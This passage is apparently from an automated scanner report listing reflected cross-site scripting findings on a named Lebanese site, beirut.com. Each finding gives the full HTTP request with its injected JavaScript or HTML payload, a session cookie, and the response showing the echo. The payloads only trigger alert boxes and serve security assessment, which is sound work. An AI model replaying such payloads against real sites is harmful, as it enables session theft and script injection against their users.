Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:57:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/4120758082/Textiles/478fd0'-alert(1)-'f64efe3a9fd';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1045. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 821ac"><a>cdaf24a24dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping821ac"><a>cdaf24a24dc/Home-Furnishings/4120758082/Tools-Hardware/30 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:07:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping821ac"><a>cdaf24a24dc">
...[SNIP]...

4.1046. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79a03'-alert(1)-'ecbe13b7b22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping79a03'-alert(1)-'ecbe13b7b22/Home-Furnishings/4120758082/Tools-Hardware/30 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:16:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping79a03'-alert(1)-'ecbe13b7b22/Home-Furnishings/4120758082/Tools-Hardware/30';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1047. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 21a5f<script>alert(1)</script>d6e699e23c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishings21a5f<script>alert(1)</script>d6e699e23c8/4120758082/Tools-Hardware/30 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:19:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishings21a5f<script>alert(1)</script>d6e699e23c8 <a href="#" id="backlink">
...[SNIP]...

4.1048. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2e3c'-alert(1)-'1ef30aba2cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishingse2e3c'-alert(1)-'1ef30aba2cb/4120758082/Tools-Hardware/30 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:18:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Home-Furnishingse2e3c'-alert(1)-'1ef30aba2cb/4120758082/Tools-Hardware/30';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1049. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 598bf'-alert(1)-'dd8bdd55a7d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082598bf'-alert(1)-'dd8bdd55a7d/Tools-Hardware/30 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:22:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/4120758082598bf'-alert(1)-'dd8bdd55a7d/Tools-Hardware/30';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1050. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d81b6'-alert(1)-'a9e5bf09def was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Tools-Hardwared81b6'-alert(1)-'a9e5bf09def/30 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:26:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/4120758082/Tools-Hardwared81b6'-alert(1)-'a9e5bf09def/30';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1051. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e890f'-alert(1)-'c82615d10fb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Tools-Hardware/30e890f'-alert(1)-'c82615d10fb HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:30:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082/Tools-Hardware/30e890f'-alert(1)-'c82615d10fb';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1052. http://www.beirut.com/Shopping/Shopping-Centers/492064852 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7488'-alert(1)-'4b7fda2f3b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppingd7488'-alert(1)-'4b7fda2f3b5/Shopping-Centers/492064852 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:50:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shoppingd7488'-alert(1)-'4b7fda2f3b5/Shopping-Centers';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1053. http://www.beirut.com/Shopping/Shopping-Centers/492064852 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ae3e"><a>363c9f6e92d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping8ae3e"><a>363c9f6e92d/Shopping-Centers/492064852 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:39:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping8ae3e"><a>363c9f6e92d">
...[SNIP]...

4.1054. http://www.beirut.com/Shopping/Shopping-Centers/492064852 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1292a<script>alert(1)</script>b54ac23f37c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Shopping-Centers1292a<script>alert(1)</script>b54ac23f37c/492064852 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:54:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Shopping Centers1292a<script>alert(1)</script>b54ac23f37c <a href="#" id="backlink">
...[SNIP]...

4.1055. http://www.beirut.com/Shopping/Shopping-Centers/492064852 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f7ef'-alert(1)-'18ec9d51012 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Shopping-Centers1f7ef'-alert(1)-'18ec9d51012/492064852 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:54:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Shopping-Centers1f7ef'-alert(1)-'18ec9d51012';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1056. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852/Commercial-Centers/12

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d8af'-alert(1)-'44e30860094 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping8d8af'-alert(1)-'44e30860094/Shopping-Centers/492064852/Commercial-Centers/12 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:48:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping8d8af'-alert(1)-'44e30860094/Shopping-Centers/492064852/Commercial-Centers/12';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1057. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852/Commercial-Centers/12

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abd55"><a>64eb7a78900 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingabd55"><a>64eb7a78900/Shopping-Centers/492064852/Commercial-Centers/12 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:40:25 GMT
